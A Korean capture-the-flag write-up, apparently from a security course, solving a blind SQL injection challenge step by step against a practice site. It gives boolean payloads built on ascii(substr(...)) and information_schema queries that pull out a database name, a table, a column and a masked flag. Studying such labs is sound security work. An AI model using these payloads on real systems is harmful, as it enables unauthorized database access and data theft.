1. 8 주차 SQL injection 데이터 추출 문제 풀이(2)


※ 주의 사항 :

1. 교육 목적으로만 이용 해주세요.
2. 무단 침입, 데이터 유출, 개인 정보 침해 등 불법적인 활동은 심각한 법적 결과를 초래할 수 있습니다.
3. 개인적인 테스트 환경을 구축해서 실습하시길 바랍니다.


1.1  SQLi Point 2 문제 


image-20240612204234463


1.1.1 sql injection 포인트 찾기


마이페이지와 게시판이 존재합니다.

image-20240612204423453

image-20240612204359138

image-20240612204614693

image-20240612205028717

image-20240612205055104


1.1.2 select 문구가 사용가능한 지 체크


image-20240612205154382

image-20240612205214639


1.1.3 공격 format 만들기


(ascii(substr((select ~~),1,1))>0) and username


1.1.4 DB이름 확인하기


(ascii(substr((select database() limit 0,1),1,1))>0) and username

image-20240612205441694

sqli_7


1.1.5 table이름 확인하기


select table_name from information_schema.tables where table_schema=’sqli_7’ limit 0,1

(ascii(substr((select table_name from information_schema.tables where table_schema=’sqli_7’ limit 0,1),1,1))>0) and username

image-20240612205643107

flagTable


1.1.6 column 이름 확인하기


select column_name from information_schema.columns where table_name=’flagTable’ limit 0,1

(ascii(substr((select column_name from information_schema.columns where table_name=’flagTable’ limit 0,1),1,1))>0) and username

image-20240612205852379

flag


1.1.7 data 추출하기


select flag from flagTable limit 0,1

(ascii(substr((select flag from flagTable limit 0,1),1,1)>0) and username

f~~

w~~

image-20240612223150754

segfault{~~}

댓글남기기

참고